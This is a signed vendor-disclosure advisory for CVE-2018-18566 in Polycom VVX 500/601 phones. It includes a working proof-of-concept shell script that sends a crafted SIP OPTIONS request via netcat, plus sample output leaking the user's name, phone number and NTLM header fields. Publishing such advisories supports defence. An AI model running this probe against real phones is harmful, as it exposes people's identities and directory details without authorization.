Polycom VVX 500 / VVX 601 5.8.0.12848 Information Exposure

`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256  
  
Advisory ID: SYSS-2018-028  
Product: VVX 500 / VVX 601  
Manufacturer: Polycom  
Affected Version(s): <= 5.8.0.12848  
Tested Version(s): 5.4.0.10182, 5.8.0.12848  
Vulnerability Type: Information Exposure (CWE-200)  
Risk Level: Low  
Solution Status: Open  
Manufacturer Notification: 2018-08-29  
Solution Date: 20??-??-??  
Public Disclosure: 2018-10-23  
CVE Reference: CVE-2018-18566  
Authors of Advisory: Micha Borrmann (SySS GmbH)  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Overview:  
  
If a Polycom VVX 500/601 [1] is used with an on-premise installation  
with Skype for Business, the phone leaks the configured phone number  
and the name to unauthorized clients via SIP.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Vulnerability Details:  
  
The phone has a SIP service running by default on TCP port 5060. This  
service can be abused to leak information about the configuration of  
the phone.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Proof of Concept (PoC):  
  
Script getdatafrompolycom.sh  
  
#!/bin/sh  
# Micha Borrmann <[email protected]>  
  
OWNIP=192.168.100.102  
  
if [ -z "$1" ]   
then  
echo "Please enter an IPv4 address as target"  
exit  
else  
TARGET=$1   
fi  
  
echo 'OPTIONS sip:dummy SIP/2.0  
Via: SIP/2.0/TCP '$OWNIP':5060  
To: <sip:'$OWNIP':5060>  
From: <sip:127.0.0.1:5060>  
Call-ID: 1  
CSeq: 1 OPTIONS  
Contact: <sip:127.0.0.1:5060>  
Accept: application/sdp  
Content-Length: 0  
' | recode ..ibmpc | netcat -w 1 $TARGET 5060  
  
Start the script against a phone and see the result:  
  
$ ./getpolycom.sh 192.168.100.101  
SIP/2.0 200 OK  
Via: SIP/2.0/TCP 192.168.100.102:5060  
From: <sip:127.0.0.1:5060>  
To: "Micha Borrmann" <sip:192.168.100.102:5060>;tag=F75D6627-FE135FAE  
CSeq: 1 OPTIONS  
Call-ID: 1  
Contact: <sip:[email protected];opaque=user:epid:XYZ...;abcd>  
Allow: INVITE,ACK,BYE,CANCEL,OPTIONS,INFO,MESSAGE,SUBSCRIBE,NOTIFY,PRACK,UPDATE,REFER  
Supported: replaces,100rel  
User-Agent: Polycom/5.8.0.12848 PolycomVVX-VVX_601-UA/5.8.0.12848  
Accept-Language: en  
P-Preferred-Identity: "Micha Borrmann" <sip:[email protected]>,<tel:+49XYZ334455661234;ext=1234>  
Accept: application/sdp,text/plain,message/sipfrag,application/dialog-info+xml  
Accept-Encoding: identity  
Supported: 100rel,replaces,norefersub,sdp-anat  
Authorization: NTLM qop="auth", realm="SIP Communications Service", opaque="1234CAFE", crand="cafe1234", cnum="11", targetname="server.example.com", response="0000000000000000000000000001"  
Content-Length: 0  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Solution:  
  
Install the new firmware which has disabled the SIP service by default.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Disclosure Timeline:  
  
2018-08-13: Detection of the vulnerability  
2018-08-29: Vulnerability reported to manufacturer  
2018-10-22: CVE number assigned  
2018-10-23: Public release of the security advisory  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
References:  
[1] Product web sites for the phones  
https://support.polycom.com/content/support/emea/emea/en/support/voice/business-media-phones/vvx500.html  
https://support.polycom.com/content/support/emea/emea/en/support/voice/business-media-phones/vvx601.html  
[2] SySS Security Advisory SYSS-2018-028  
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2018-028.txt  
[3] SySS Responsible Disclosure Policy  
https://www.syss.de/en/responsible-disclosure-policy/  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Credits:  
  
This security vulnerability was found by Micha Borrmann of SySS GmbH.  
  
E-Mail: micha.borrmann (at) syss.de  
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Micha_Borrmann.asc  
Key Fingerprint: F2E7 C6A5 9950 84ED 7AD6 0DD4 EDBE 26E7 14EA 5876  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Disclaimer:  
  
The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory  
may be updated in order to provide as accurate information as  
possible. The latest version of this security advisory is available on  
the SySS Web site.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Copyright:  
  
Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en  
-----BEGIN PGP SIGNATURE-----  
  
iQIzBAEBCAAdFiEE8ufGpZlQhO161g3U7b4m5xTqWHYFAlvO5bkACgkQ7b4m5xTq  
WHZWBg//eaZW/155/oKVQ5bH8jZ8bPpfe2mbETZ1xU4df60IG16g8/Tz61TEcAu7  
N9q3XtdR389shVEG+EQ2Fg9EA5loVX1MMAT3YvaITJbMoRSmX53Sa68mUaPBMWAl  
KZQKJD0kFlywsPL25BUQoJVVjvV+y3X45opRQ6u+wf4j5zdrS381CXG1zo4i5YWz  
ENHv8uKrcgfTkGpejb61+dAH3K4VssjDNES3kvv1EfCQzOPY8TfTOGQ4MrRPwnZo  
p2cfNjIUwKfkqEbNVA/WSiSNOSM12H9DgxzzZI/QxRS76d2pNtWBARVwxArS/DPK  
A/lyFswBBCP2timeq+94FC0pXSfCNZazgD4O/pcLXVMis3FiTiJOdRyVrX8pYdr+  
Pe+qsve/m+r0fO6dmOimIzx7I/GIT6ARYqJ5cbXdtDDGKAUpNjKixZxjPnBjWst4  
tuVHn6PINzPmvGxBcZu4i8VxUPsTXMl992xz/3JDNtIy6sklfwhAN1wdJqLjB4yW  
XkirVDdS1aTkLyrs+P19XGDwq+aE19K0PksA1aglv5Ha3VxJWqiaYVOSeFpE+/Ur  
jpzNmDtbr8FTq9G1JYgstcCvEv325gd11zvCMsG23cgIBLFqi8r7VWqXGuABPI/b  
/upHU1fv2sZe8PHexfFuyO7f0w1LGDrcL+IXoLyDKRVNc3joC7c=  
=dxlv  
-----END PGP SIGNATURE-----  
`